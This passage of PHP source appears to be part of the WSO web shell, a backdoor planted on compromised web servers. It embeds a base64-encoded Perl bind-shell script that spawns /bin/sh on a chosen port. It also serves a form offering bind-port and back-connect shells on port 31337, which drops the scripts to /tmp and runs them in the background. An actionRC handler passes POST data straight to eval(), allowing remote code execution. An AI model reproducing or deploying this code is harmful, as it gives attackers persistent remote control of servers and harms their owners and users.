1890$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1891echo "<h1>Network tools</h1><div class=content>
1892
1893 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
1894 <span>Bind port to /bin/sh [perl]</span><br/>
1895 Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1896 </form>
1897 <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
1898 <span>Back-connect [perl]</span><br/>
1899 Server: <input type='text' name='server' value='".$_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1900
1901 </form><br>";
1902if(isset($_POST['p1'])) {
1903function cf($f,$t) {
1904$w = @fopen($f,"w") or @function_exists('file_put_contents');
1905if($w){
1906@fwrite($w,@base64_decode($t));
1907@fclose($w);
1908}
1909}
1910if($_POST['p1'] == 'bpp') {
1911cf("/tmp/bp.pl",$bind_port_p);
1912$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
1913echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
1914unlink("/tmp/bp.pl");
1915}
1916if($_POST['p1'] == 'bcp') {
1917cf("/tmp/bc.pl",$back_connect_p);
1918$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1919echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
1920unlink("/tmp/bc.pl");
1921}
1922}
1923echo '</div>';
1924wsoFooter();
1925}
1926function actionRC() {
1927if(!@$_POST['p1']) {
1928$a = array(
1929"uname"=>php_uname(),
1930"php_version"=>phpversion(),
1931"wso_version"=>WSO_VERSION,
1932"safemode"=>@ini_get('safe_mode')
1933);
1934echo serialize($a);
1935}else {
1936eval($_POST['p1']);
1937}
1938}
1939if( empty($_POST['a']) )
1940if(isset($default_action) &&function_exists('action'.$default_action))
1941$_POST['a'] = $default_action;
1942else
1943$_POST['a'] = 'SecInfo';
1944if( !empty($_POST['a']) &&function_exists('action'.$_POST['a']) )
1945call_user_func('action'.$_POST['a']);
1946function FetchURL($url) {
1947$ch = curl_init();
1948curl_setopt($ch,CURLOPT_USERAGENT,"$cheader");
1949curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
1950curl_setopt($ch,CURLOPT_HEADER,false);
1951curl_setopt($ch,CURLOPT_URL,$url);
1952curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1953curl_setopt($ch,CURLOPT_TIMEOUT,30);
1954$data = curl_exec($ch);
1955if(!$data) {
1956return false;
1957}
1958return $data;
1959}
1960exit;